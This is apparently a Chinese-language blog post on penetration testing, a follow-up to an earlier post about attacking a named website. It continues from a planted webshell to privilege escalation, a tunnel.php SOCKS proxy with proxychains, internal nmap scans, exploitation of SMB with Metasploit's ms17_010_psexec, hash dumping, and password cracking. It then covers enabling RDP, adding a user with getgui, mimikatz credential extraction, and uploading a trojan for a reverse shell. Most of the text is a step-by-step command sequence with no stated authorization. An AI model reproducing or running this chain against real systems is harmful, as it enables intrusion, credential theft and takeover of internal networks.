這篇是由上篇 【滲透過程】嘉緣網站--測試
https://www.cnblogs.com/G-Shadow/articles/10964374.html
之后的操作,文章包括了提權,HTTP代理及對內網的滲透
使用蟻劍連接上寫入的一句話后,使用虛擬終端發現自己權限為最高權限可以執行任何操作
這里講一下提權,假如權限不高,需要進行提權
首先:查看服務器的操作系統
如果這里為win2003,可以找台2003的機器把cmd.exe程序上傳到目標服務器
跳到該目錄下執行cmd 你會發現權限權限有所提升,可以執行一下基礎命令,但是還是無法執行新建用戶,開啟3389端口等命令
這時我們只需上傳提權工具如pr 巴西烤肉等
使用提取權工具進行命令的執行,這樣我們就達到提權的目的了


接着上篇,當我們使用蟻劍進行執行Dos命令發現目標服務器存在2塊網卡
(這里蟻劍如果無法執行命令,可以上傳一個大馬)

而且發現在238段下還有內網服務器
arp -a

需要進行掛代理,只有這樣才能對內網服務器進行測試
代理設置:
(因為要對內網進行其他操作,所有這里只介紹如何給kali進行代理設置)
首先安裝:


安裝插件

安裝完成后
這里需要通過菜刀或蟻劍上傳所需的文件(網站為php站這里上傳tunnel.php)
上傳成功后進行監聽 ,監聽的終端不能關需要一直開啟


再次開啟一個終端 修改配置文件

把dynamic_chain前的#刪掉

同時在最下方加入 socks5 127.0.0.1 9632(這里的9632為你上方監聽的端口)之后退出保存


通過打開的網頁訪問內網IP 192.168.238.128 這時進行監聽的終端開始跑了並成功顯示探針 說明代理設置成功

如果監聽的終端沒有變化,網頁也沒顯示,需要進行以下操作,之后再次從終端打開瀏覽器


如果還不成功,請關機,從新啟動一下kali (修改的配置沒有運行成功,需要重啟)
添加路由 route add -net 192.168.90.0 netmask 255.255.255.0 dev eth0 route add -net 192.168.80.0 netmask 255.255.255.0 dev eth0 route add -net 192.168.90.0/24 gw 192.168.90.1 刪除路由 route del -net 192.168.80.0 netmask 255.255.255.0 dev eth0
內網滲透
針對445端口
代理成功后,每此執行命令或使用軟件時 在命令前加上 proxychains
之后使用nmap開始對 192.168.238.129 129.168.238.130 進行端口掃描
proxychains nmap -vvv -n -sT -PN 192.168.238.129 proxychains nmap -vvv -n -sT -PN 192.168.238.130
發現2個都開135 139 445端口 這里只對445進行
192.168.238.129

192.168.238.130

對192.168.238.129:445
使用kali的工具
proxychains msfconsole //啟動MSF終端

使用攻擊模塊
search option //搜索相關工具和攻擊載荷 use use exploit/windows/smb/ms17_010_psexec //啟動該模塊 show options //查看相關信息

set RHOST 目標IP
set LHOST 本機IP
set threads 端口
exploit //執行 或者用run

執行成功后會返回meterpreter 當執行命令有可能不會回顯,因為有代理有可能返回的包會丟失 但是命令會執行
我們嘗試直接利用 getuid 和 getsystem 命令來提權

使用命令獲取hash值
run post/windows/gather/smart_hashdump

通過撞庫得到administrator的密碼

使用得到密碼和賬戶使用kaili的遠程桌面進行連接
proxychains rdesktop IP //遠程連接 目標機需要開啟3389端口

run post/windows/manage/enable_rdp //開啟3389
run getgui -u xxxxx -p xxxxx //添加用戶
download c:\\1.txt //下載文件
upload ll.txt c:\ //上傳文件
cat 11.txt //查看文件
pwd //查詢當前路徑
sysinfo //顯示遠程主機的系統信息,顯示計算機、系統信息、結構、語言等信息
介紹個神器 mimikatz :
load mimikatz
msv (獲取 hash 值)
ssp (獲取明文信息)
wdigest (獲取系統賬戶信息)
mimikatz_command -f a:: (必須要以錯誤的模塊來讓正確的模塊顯示)
mimikatz_command -f hash:: (獲取目標 hash)
如果直接使用開啟3389端口命令無法執行的話,可以在本地生產一個木馬文件通過上傳一個木馬文件
創建會話反彈會一個shell
從新開啟一個終端


同時使用另一個終端上傳生成的exe程序 並執行

